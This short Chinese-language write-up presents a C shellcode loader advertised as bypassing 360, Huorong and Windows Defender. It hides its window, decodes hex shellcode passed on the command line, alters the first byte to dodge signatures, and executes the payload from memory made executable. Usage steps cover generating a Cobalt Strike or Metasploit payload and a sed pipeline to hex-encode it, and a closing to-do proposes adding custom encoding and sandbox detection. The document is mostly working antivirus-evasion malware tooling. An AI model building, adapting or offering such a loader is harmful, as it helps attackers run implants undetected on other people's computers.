0x01 代码：

• Bypass360 火绒 Windows Defender

#include <stdio.h>
#include <Windows.h>

#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") # 隐藏窗体

int main(int argc, char* argv[]) {
    
	unsigned int char_in_hex;
	char* info = argv[1]; # 输入获取
	unsigned int iterations = strlen(info);
	unsigned int memory_allocation = strlen(info) / 2;

	# 反转字符Hex
	for (unsigned int i = 0; i < iterations - 1; i++) {
		sscanf_s(info + 2 * i, "%2X", &char_in_hex);
		info [i] = (char)char_in_hex;
	}
	
    # 替换shellcode第一字符串，加载在内存中在替换回来
    
	char fisrt[] = "\xfc";
	void* exec = VirtualAlloc(0, memory_allocation, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
	memcpy(info, fisrt, 1);
	memcpy(exec, info, memory_allocation);
	DWORD ignore;
	VirtualProtect(exec, memory_allocation, PAGE_EXECUTE, &ignore);
	typedef void(*some_one)();
	some_one func = (some_one)exec;
	func();

	return 0;
}

0x02 使用方法：

1. CS MSF生成C语言paylaod:

   

2. 字符串处理，生成C文件只保留，shellcode部分：

3. Linux命令处理,生成16进制字符串，用编译好的exe加载：

cat shell.txt | grep -v unsigned | sed "s/\"\\\x//g" | sed "s/\\\x//g" | sed "s/\"//g" | sed ':a;N;$!ba;s/\n//g' | sed "s/;//g"

4. 加载测试：

0x03 To do

后续可以加入自定义算法，简单的沙箱子判断，实现免杀